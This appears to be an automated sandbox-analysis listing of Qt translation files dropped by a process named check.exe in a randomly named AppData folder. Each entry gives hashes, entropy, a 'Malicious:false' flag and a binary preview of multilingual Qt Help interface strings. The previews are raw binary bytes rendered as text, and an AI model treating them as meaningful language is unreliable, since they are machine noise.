                                                                                                                                                                                                            SHA1:65935A67C73F19FCF6023FB95030A5ACAF9DA21C
                                                                                                                                                                                                            SHA-256:316FE8D0815E2B4B396895BEB38EF1A40431915B5E054DF80F4C0CD556F26E4B
                                                                                                                                                                                                            SHA-512:AD7CA93D93A69F273CE80BE7F2F477543B9C5F9C7E4D7448223BFF084EA956B626D6837F22D83C5E282688B938F58C29073C4B5C6F26A797F716C14FABF9FFEE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......it_ITB...(.(.....g.0T....y.5w... ..Uj....2.`.......a[............'..t..............39..........&..........B<s...j..M^...h......K...J..%..O5^...K..)^......o>...u...J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>.................o..G..."...w............-......./..,................^...'........$a......6.>..........#...K...........$..W.b....._Xn......GN......~.......TH.."n.!.....5.K.H..#"......>..pN..........&..P.~.....o.....~..(....p.....!...~....A.s.>.....o.... ..z.q..........................q.h....!0.......*..e....;i..'!......(.L.a. .c.a.u.s.a. .d.i. .c.i... .p.o.t.r.e.b.b.e. .e.s.s.e.r.e. .c.h.e. .l.'.i.n.d.i.c.i.z.z.a.z.i.o.n.e. .d.e.l.l.a. .d.o.c.u.m.e.n.t.a.z.i.o.n.e. ... .a.n.c.o.r.a. .i.n. .c.o.r.s.o...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.......R.i.s.u.l.t.a.t.i. .d.e.l.l.a. .r.i.c.e.r.c.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7917
                                                                                                                                                                                                            Entropy (8bit):5.680408580146589
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:mP6J37GcBzRjYEPEJJGTnwfJJxb7FTPjzzZBL3/q/I53:mSVqclR5s6Tnwfb7Pj/PL3/q/w3
                                                                                                                                                                                                            MD5:1380A9352C476071BDA5A5D4FED0B6C5
                                                                                                                                                                                                            SHA1:9B737ED05F80FE5D3CD8F588CCEC16BB11DD3560
                                                                                                                                                                                                            SHA-256:AE603B2C0D434D40CDE433FFCBA65F9EE27978A9E19316007BE7FE782A5B8B47
                                                                                                                                                                                                            SHA-512:EC3D68126488C3A163898BACAF7E783217868573635182CAF511ED046B4BE1F99A71FBB24DA607CCB50EDAF70893007AAEE9A6BAAE4C1CD33465A0915AA965DA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......jaB...(.(.....S.0T......5w....'.Uj......`.......a[............u..t............!.39.....................B<s......M^..............J...>.O5^...O..)^......o>.......J...............t...w.8dz.....D ......k.N.....k.N...H...n.......I...........i..2>...<......G......9..G....P..w............i..........,................^..........'.$a......6.>...5..........K............S.W.b...2._Xn......GN...@..~.......TH.....!.......K.H.............pN...........S.P.~.....o.....|..(..............~....o.s.>.....o.......z.q..................@.........h.....&....... ..e.....i........@.(0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0K0.0W0.0~0[0.0..).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..:..........Note:.....QCLuceneResultWidget......i.}"}Pg...........Search Results.....QCLuceneResultWidget.....R0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0.i.}"}Pg.0LN.[.Qh0jS..`'0L0B0.0~0Y0..........VThe search results may
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5708
                                                                                                                                                                                                            Entropy (8bit):5.698914195742074
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:elPQHJ6L4c7LaQaFQv2QEhBL+Ejma0W40U0BzlQlcrnUSaTIdspIc18CLRSM3LBY:dHI97W1BbNz1VqqzJpoj5y5uY7OGrWFE
                                                                                                                                                                                                            MD5:CD15674A652C2BF435F7578E119182F8
                                                                                                                                                                                                            SHA1:AEA22E4A0D21396733802C7AB738DDD03737B7D6
                                                                                                                                                                                                            SHA-256:F11C64694E8E34E1D2C46C1A1D15D6BA9F2DB7B61DE4FDF54ECA5AB977C3E052
                                                                                                                                                                                                            SHA-512:88BFA112F4DBC0BFB4013CE0937E5180B4AB4A217FC8A963798C7C86532E794E4A1AD88416AE42F26A1C0631B465A5D69BFE75366E048502F5E21F4115A12F19
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......koB............%.......0T......K:^...g.Uj......`........YJ...>.E.4...........z...>..........;.B<s...K.B\>...b........+.s.....zq....[..9....F..vR......@.......@.......:....c.8Z......g.N...7..F....|...........t.....D ......k.N.......I...m..^......`#....!..2.......G....@...N.................................X..K....{.......i..GN......NO.............K.H..........S..pN...z..V...............................>...........:.~.....i..%c.....z.q....i...s......D.0. .............Add Filter.....FilterNameDialogClass.......D.0. .t...:..........Filter Name:.....FilterNameDialogClass........... ...L..........Untitled.....QHelp.....(...L... ...|.D. .....`. ... ...L.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....".....0...|. .... ... ...L.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....2...|. .%.1... ...x. .L.t...D. .... ... .................&Cannot create index tables in file %1......QHelpCollectionHandler.....,.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9673
                                                                                                                                                                                                            Entropy (8bit):4.622652249027856
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:TO/7kBL9wGu3wtCnlhLJUBB7oph+mZ18LgP:T8QnwcCnlhdvphpZ18LgP
                                                                                                                                                                                                            MD5:2B68446B69D9AA40B273D75A581D2992
                                                                                                                                                                                                            SHA1:8A09BD38998543B74E2673478EDD54FB4BBDD068
                                                                                                                                                                                                            SHA-256:CC6CB4D8C54086224672F2E49E623C8CB7C0C1CD65B8D5ECD42FC9BA3A6065BD
                                                                                                                                                                                                            SHA-512:F3A3D6A416B3411613B06FC3EE56625D4D4DE80087182AB0D0601E49314861ABEF97D11A15B4C0511911544A59FBC4A4A52F0CCF0FD43F763A76A8922D8E57B6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......plB.....(.......0T....T.5w......Uj... R.`.......a[...............t............2.39....H......6.......n.B<s.. ...M^..._......6.O5^...F..)^......o>...............t.....D ......k.N.....k.N.../...n.......I...W..........2>...w................G.......w............&.......:..,................^...(..... ..$a....?.6.>...$..........K......W.b....._Xn......GN...Y..~......!.....*.K.H...E....."...pN...-.........P.~...}.o........(....1..~......s.>......%c.."..o.....r.z.q............................h................e.....i..#.......N.i.e.n.a.z.w.a.n.y..........Untitled.....QHelp.....P.N.i.e. .m.o.|.n.a. .s.k.o.p.i.o.w.a... .p.l.i.k.u. .z. .k.o.l.e.k.c.j...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....>.N.i.e. .m.o.|.n.a. .u.t.w.o.r.z.y... .k.a.t.a.l.o.g.u.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....H.N.i.e. .m.o.|.n.a. .u.t.w.o.r.z.y... .t.a.b.e.l. .w. .p.l.i.k.u. .%.1........... Cannot create tables in file
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7288
                                                                                                                                                                                                            Entropy (8bit):5.297177914619657
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:dBJjvfq7D6X68uBAzlp5W9+yBPZZZMM7vL0PXJL:JKrMEL0PXJL
                                                                                                                                                                                                            MD5:794AF445A5D7082D51BD22683449F86D
                                                                                                                                                                                                            SHA1:3A0C369872B112A1572AA17EEB814B168B225D98
                                                                                                                                                                                                            SHA-256:557B644E6DA5F1EC720EF93965617087E4D1F40B2494CC5AA524CF3796108DE7
                                                                                                                                                                                                            SHA-512:D42C870A16AEE7626BBE24886AD423895529A2F1A51AC2DBC303BC0E4EF9D3241FE894ECA3F7217AD408C8DCEE165CA4B89D84570357B0EB80340A3F72B0A846
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ruB..........\.%.......0T......K:^.....Uj....L.`........YJ...X.E.4...............>............B<s.....B\>............+.s.....zq.......9....B..vR...L..@.......@....G..:......8Z......g.N......F....>...........t.....D ....R.k.N...E...I...W..^......`#....s..2.......G....^...N.........................K.......d..K............O..GN...b..NO.............K.H.............pN...P..V....................g..........>.............~........%c.....z.q....i........$...>.1.0.2.;.5.=.8.5. .D.8.;.L.B.@.0..........Add Filter.....FilterNameDialogClass.........<.O. .D.8.;.L.B.@.0.:..........Filter Name:.....FilterNameDialogClass.........5.7.K.<.O.=.=.K.9..........Untitled.....QHelp.....b...5. .C.4.0.;.>.A.L. .A.:.>.?.8.@.>.2.0.B.L. .D.0.9.;. .:.>.;.;.5.:.F.8.8. .A.?.@.0.2.:.8.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....<...5. .C.4.0.;.>.A.L. .A.>.7.4.0.B.L. .:.0.B.0.;.>.3.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....`
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10388
                                                                                                                                                                                                            Entropy (8bit):4.70568613551943
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:uPq7iBWseXKkVu4+Qv9zEJ1xGMaLNmBgJqdC6/MxIMt:LWcseV04Xv9zEoLNDJqdX/MxRt
                                                                                                                                                                                                            MD5:75C94E59F1FC5312AE25381C247AF992
                                                                                                                                                                                                            SHA1:E3E5F4582CC5FAFE6DF43644D11484861023C084
                                                                                                                                                                                                            SHA-256:F41E33E1D790BD0D3EB180F1F875BC191FE74773628F25C2CAD95E1402E66867
                                                                                                                                                                                                            SHA-512:959B8F4D57FC9728DD4804322333D1792D45A0EE85615B559E0CA3BD2DEA22E2C8C68C6482AE9425D29C819B0ED27473EDDC82EF4B6ECFFB2E2E7B56E1509B63
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......sk_SKB...8.(.......0T......Uj......`.....0.a[....8..........t..............1"......39.......s........... .....%..........B<s...6..MQ..............J..$-.0.......O5Q......)Q...;..o>...........G...J..$......."....t.....8dz..#..D ......k.A...2.k.A.......n..._...I.................. ...21..........e.........G...!...w....Y...........!...........=...Q............$a......6.>.........."...K....i......# ._Xa..."..GA..............~.......TH..!{.K.H.."7.........pA..........%..P.~.....o........(..........!...~....u.s.1.....o.......z.q...c..............................f..e....9i..&-......(.D...v.o.d.o.m. .m...~.e. .b.y.e. .t.o.,. .~.e. .d.o.k.u.m.e.n.t...c.i.a. .s.t...l.e. .n.i.e. .j.e. .z.i.n.d.e.x.o.v.a.n.....).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......P.o.z.n...m.k.a.:..........Note:.....QCLuceneResultWidget.....".V...s.l.e.d.k.y. .h.>.a.d.a.n.i.a..........Search Results.....QCLuceneResultWidg
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10363
                                                                                                                                                                                                            Entropy (8bit):4.613473842638716
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:vNBqTi7qBCVIQf54EslZ2Jy/L/BnmpP0bX3caK6q1B6/hgIlCCUb0:vjq2+UVT4ESZOYmpP0bX26q1I/yqCCUw
                                                                                                                                                                                                            MD5:3B0AEE27B193A8A563C5CB5C7C4FE60F
                                                                                                                                                                                                            SHA1:C94E832595EC765370553468F87C02DB7E7D138A
                                                                                                                                                                                                            SHA-256:2EC955E662407EBCD8DCDAE5AAA21E4108E0B5B0AEE0E9DB712C27072943535F
                                                                                                                                                                                                            SHA-512:EBC25C378126876F44279E23CA0CF06FC9E7D5F51AD7E3DBDABA7A50C81112EDC1C76F7FD0AF47E447A93C3593BB953A0C9C1FBBFC49494E6B29BF21655F690E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......slB...8.(.....E.0T......Uj......`.......a[............!..t..............1"....;.39.......s....^............$........i.B<s...,..MQ..........}...J..#..0.....Z.O5Q...[..)Q......o>...............J..$I......"W...t...C.8dz..#H.D ......k.A.....k.A.......n.......I.................. P..21....................G...!...w............?...!...3...........Q...+........$a....>.6.>.........."...K...........".._Xa......GA..............~....A..TH..!I.K.H..!..........pA...>......%..P.~...>.o........(....d..... ...~......s.1.....o.......z.q.....................................e....{i..&.....z.(.R.a.z.l.o.g. .j.e. .m.o.r.d.a. .t.o.,. .d.a. .s.e. .d.o.k.u.m.e.n.t.a.c.i.j.o. .a.e. .v.e.d.n.o. .i.n.d.e.k.s.i.r.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......O.p.o.m.b.a.:..........Note:.....QCLuceneResultWidget.....".R.e.z.u.l.t.a.t.i. .i.s.k.a.n.j.a..........Search Results.....QCLuceneResultWidget.......R.e.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4629
                                                                                                                                                                                                            Entropy (8bit):4.68793836539357
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:BoiK0UD2wMLb7Lqlguotqbww5BLNwWjK0kHU9zuQlUVUfniqthweEIFwC18lLEGA:PXFf7pU75BWWOpcJcVqDFNz8brgyf76r
                                                                                                                                                                                                            MD5:32D6EE3D8EE6408A03E568B972F93BCB
                                                                                                                                                                                                            SHA1:582EE079DBD42000C378E0701D26405750524DBA
                                                                                                                                                                                                            SHA-256:EBDECA0CFEE7A9441DEB800BABFD97C63BC4E421DA885C55B3BD49725EBACD25
                                                                                                                                                                                                            SHA-512:24AAA30B9CB4DB82A57411FBA24A87D70D8B845AE48A6FDA633D0BE6B824B58FDD2F450C2B385F16F49E2F9C6FA0A3124FD0F28594726940F996C66F8F3216CC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......tr_TRB.....%.....[.0T......Uj......`.....$..............L.B<s.....B\>..........4.+.s...............t.....D ......k.N...5...I......2.......G....5...N..........a...............f..K....9..........GN...........@.K.H..........q..pN...t..........>...z.~...../..%c.....z.q....i..........B.a._.l.1.k.s.1.z..........Untitled.....QHelp.....J.K.o.l.e.k.s.i.y.o.n. .d.o.s.y.a.s.1. .k.o.p.y.a.l.a.n.a.m.1.y.o.r.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....2.D.i.z.i.n. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....\.%.1. .d.o.s.y.a.s.1.n.d.a. .d.i.z.i.n. .t.a.b.l.o.l.a.r.1. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r...........&Cannot create index tables in file %1......QHelpCollectionHandler.....N.%.1. .d.o.s.y.a.s.1.n.d.a. .t.a.b.l.o.l.a.r. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r........... Cannot create tables in file %1......QHelpCollectionHandler.....P.S.q.l.i.t.e. .v.e.r.i.t.a.b.a.n.1. .s...r...c...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9750
                                                                                                                                                                                                            Entropy (8bit):5.281035122342072
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:eMp79BCN+u8hhbHbny+HJouHgei50JBSfDvbetpP/RIkT:eIhgNgBbny+phiS3SfDDetpP/RRT
                                                                                                                                                                                                            MD5:90A776917D534B65942063C319573CDC
                                                                                                                                                                                                            SHA1:5DF3B213D985A3BBDB476B37B7780D7D7DF17E41
                                                                                                                                                                                                            SHA-256:497CFC473684692EE44D7A3795E8FB2270C57069FD9EB98A615DD29AB9BE8A7C
                                                                                                                                                                                                            SHA-512:B34A019716B50CE8E1E20AC32756B3B0D5802971F7A04F4BDDE2418DA551AFB9742B79E934979DB6FAB9DAC05D7D26A3B19ABA77158321F8D9AAB08AEBBD455A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......uk_UAB...(.(.....?.0T......5w......Uj......`.......a[...............t............K.39....u....."..........B<s...8..M^...j......y...J..!..O5^...Y..)^......o>...o...J..":...... <...t...E.8dz..!3.D ....".k.N.....k.N...d...n.......I..............2>...>......o.........G.......w............E.......e..,................^...S........$a......6.>...'...... y..K........... ..W.b....._Xn......GN...p..~.......TH...4.!.....9.K.H.............pN..........#].P.~...~.o.....N..(....b.........~......s.>.....o.....o.z.q..........................U.h.............D..e.....i..#.......(...@.8.G.8.=.>.N. .F.L.>.3.>. .<.>.6.5. .1.C.B.8. .B.5.,. .I.>. .4.>.:.C.<.5.=.B.0.F.V.O. .4.>.A.V. .V.=.4.5.:.A.C.T.B.L.A.O...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........@.8.<.V.B.:.0.:..........Note:.....QCLuceneResultWidget.....". .5.7.C.;.L.B.0.B.8. .?.>.H.C.:.C..........Search Results.....QCLuceneResultWidget....... .5.7
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6441
                                                                                                                                                                                                            Entropy (8bit):5.790303416386852
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:pB37nBD4H5PCyLDxLSzJPduYx9vja/FIgH9yIFqfs:rTZ4HUAD1S1JFe/F59PFqfs
                                                                                                                                                                                                            MD5:9297A6905B8B1823BF7E318D9138A104
                                                                                                                                                                                                            SHA1:3DB992A1B3BBCAF314B7EA4A000D6334D7492A52
                                                                                                                                                                                                            SHA-256:C02AAA20923F18ADDAB520BE5CB84EFD4C723396BDC24B4C9A72D406F101C7B4
                                                                                                                                                                                                            SHA-512:01F12CEE0AE456D78942A6049E1C77F94B406C8FFB4A5944DE15E54D1C760CDBA13279530A8F29B1443D1BBC647D3AF5436AAD8C43EB3944316C48300B3827E4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zhB......I....L.0T......Uj......`.......a[...............t....P..@....Z.......<.........39.......s....2.................B<s......MQ..........9...J......31.....0.......O5Q......)Q...^..o>...........(...........J...V...........t.....8dz.....D ....Z.k.A.....k.A.......n.......I...........t..w................!...........o.......D...Q...E........$a......6.>...h...............%._Xa......GA..........._..TH...r.........pA.............P.~.....o.....].~.q.............~......o.....h.z.q...........H..0q....................i........2..S.u...y.`.Q.v.S.V.S..f/V.N:..e.hckcW(..}"_.0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..............Note:.....QCLuceneResultWidget......d.}"~.g...........Search Results.....QCLuceneResultWidget.....,d.}"~.g.N_..^vN.[.et..V.N:..e.hckcW(..}"_............VThe search results may not be complete since the documentation is still being indexed!.....QCLuceneResultWidget..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9301
                                                                                                                                                                                                            Entropy (8bit):5.80411750798786
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:4bgIXwsL78BQp4dRDP0ludqODa/wkB/tTWn5dJ6mO8IZiT9Dzz/wI3HyRWqUqS:lI/oS4dR5c/tTWn5/EZA9D/w+H8WqUqS
                                                                                                                                                                                                            MD5:47C3328D3918CF627112BB6C50E30B86
                                                                                                                                                                                                            SHA1:05705603AB3F28402A6C103E1C41DDFF21D140C0
                                                                                                                                                                                                            SHA-256:3697F1660D7F2AC9B37AC33CD1C7ECAE08ADBD26710E7E0076497CCDDC8BC830
                                                                                                                                                                                                            SHA-512:8DE1C3C5A48965CF6D8AA545DA9F0A5C00AE124F3E4153597915E7C0F4CAE1E26723270F58A47AA9FFA4AAF30E6EBA522D4EBAD27DECF17EF108E353E611980E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zh_TWB......I....[.%.......0T......0T......Uj......Uj....R.`.....>.a[....................g..t....7..@......................39.......s................... .........B<s.....B<s.....B\>......MQ..........[...J...]..31.....+.s...c.0.....U.O5Q......)Q...C..o>.......................J...............t...3...t.....8dz.....D ....R.D ......k.A.....k.A.....k.N...'...n.......I.......I...........[..2....x..G........N......w................!...........:...........Q...&...............$a......6.>...I.......L.......$..K......................_Xa...y..GA...O..GN...........$..........TH...I.K.H................ Y..pA...K..pN.............P.~.....o.....D.~.q......>.............~......~........%c.. ..o.....!.z.q...........#..0q....................i..!Y....(..g.S..f/V.p.N.W(^.z.e.N.v.}"_.uvN-0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......P..;............Note:.....QCLuceneResultWidget......d.\.}Pg...........Sea
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):146
                                                                                                                                                                                                            Entropy (8bit):3.6255640074603277
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/IrLlAlHekfK/gp1MUXaMlI+rwtbWlMiayIPldkOgn:CwDrC+TYIUrIRt6HoiHn
                                                                                                                                                                                                            MD5:5A46979B45C67DD6312F33CCEA2ED7BC
                                                                                                                                                                                                            SHA1:4C56836B1FB10D9903B299CBCB925947D515B4C8
                                                                                                                                                                                                            SHA-256:BB246AABD501E14CED8B1FFC1369E3D5D26567AAE62B3EAD4D94C22FB77C3471
                                                                                                                                                                                                            SHA-512:BDBA4E1731CF254E95B0F1337410937C765E96FBB1D42F1D053033E1511FEE6F50C02705F781F4DAA0347E2299DC78A5A9942AC4EA343ED1F8F401F9ACD961E4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......hu....v.....q.t.b.a.s.e._.h.u.....q.t.s.c.r.i.p.t._.h.u.....q.t.m.u.l.t.i.m.e.d.i.a._.h.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.h.u
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.5752972123113778
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/EbFlAlHeke5zOp1MUWLt7KlI+rwtbWlMj5FKIPldkOA9kk:CwDM+35aIUW5SIRt6Q50oi9Gk
                                                                                                                                                                                                            MD5:2BB8C94D420D3BC344C79A01043BDC89
                                                                                                                                                                                                            SHA1:3FBA773D58E6D3699C20AB41AEE6801E71E2DDAE
                                                                                                                                                                                                            SHA-256:9117AAC2D07BC86DFA55A29B8825ED27C7093300FCC90E143E135E00E85F09D7
                                                                                                                                                                                                            SHA-512:C6B13655AFB206B0056F5656B4A9BF33CC267FCC928F6973258131CFA6443970510226FE45A041E5AA988809E17D0B11C7458F4A241C71521EDED186596C6055
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......it....v.....q.t.b.a.s.e._.i.t.....q.t.s.c.r.i.p.t._.i.t.....q.t.m.u.l.t.i.m.e.d.i.a._.i.t... .q.t.x.m.l.p.a.t.t.e.r.n.s._.i.t.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):146
                                                                                                                                                                                                            Entropy (8bit):3.599979504080125
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/il/lAlHekd6hY1MUV6JAlI+rwtbWlMgel3UlIPldkOG:Cwz4+pjUGAIRt6qVUloiB
                                                                                                                                                                                                            MD5:8A1EE3433304838CCD0EBE0A825E84D8
                                                                                                                                                                                                            SHA1:2B3476588350C5384E0F9A51FF2E3659E89B4846
                                                                                                                                                                                                            SHA-256:23457CE8E44E233C6F85D56A4EE6A2CECD87C9C7BDDE6D8B8A925902EED1CD9C
                                                                                                                                                                                                            SHA-512:2D8ACD668DF537E98B27161F9FA49828EB2EB6E9CF41DB38E7F5D31F610D150CD1B580A8AE9B472A4DFDE4D4BF983C24A56293BB911CF5879368664E4D4CF3D2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ja....v.....q.t.b.a.s.e._.j.a.....q.t.s.c.r.i.p.t._.j.a.....q.t.m.u.l.t.i.m.e.d.i.a._.j.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.j.a
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):146
                                                                                                                                                                                                            Entropy (8bit):3.652277257665055
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/rrr/lAlHekcQ/01MUUQMlI+rwtbWlMhQGlIPldkORn:CwCC+1Q/UUpIRt6SBloimn
                                                                                                                                                                                                            MD5:7B2659AF52B824EAC6C169CDD9467EE9
                                                                                                                                                                                                            SHA1:5727109218B222E3B654A8CC9933E970EB7C2118
                                                                                                                                                                                                            SHA-256:4CC1AF37E771F0A43898849CFF2CD42A820451B8D2B2E88931031629D781DB05
                                                                                                                                                                                                            SHA-512:E9475AC80BDBBEFF54F2724A2B6BA76992F18FD1913FD8EE1540A99FD7A112B79FED5A130B6AC6D7460E4420C06354FC6E4CF7770A7C6CBD3EAC1BDAF0082DE5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ko....v.....q.t.b.a.s.e._.k.o.....q.t.s.c.r.i.p.t._.k.o.....q.t.m.u.l.t.i.m.e.d.i.a._.k.o... .q.t.x.m.l.p.a.t.t.e.r.n.s._.k.o
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):165383
                                                                                                                                                                                                            Entropy (8bit):4.805977227348512
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:i5v3+zmayloj6yJjhnBAbnrKnGrhA7WgdXclIsooY9i:SvOzAloj6yJ9BA7riGr+7WKXc+s5ui
                                                                                                                                                                                                            MD5:8992B652D1499F5D2F12674F3F875A35
                                                                                                                                                                                                            SHA1:E22766A49612F79156C550D83C6C230345DDA433
                                                                                                                                                                                                            SHA-256:47EB5F97467DF769261421D54A5BEA1131C9FB9B6388791D38BB6574335B64BF
                                                                                                                                                                                                            SHA-512:9B8B6DBFF432F2A46C14BC183A6BAF84ACBF02BF2C5BB8C306C6538FBD9BE1C0A9015BD46728F2F652F9163AFC56B1E16D16EB95D8F7728F3C562AE9F4F1AE1E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
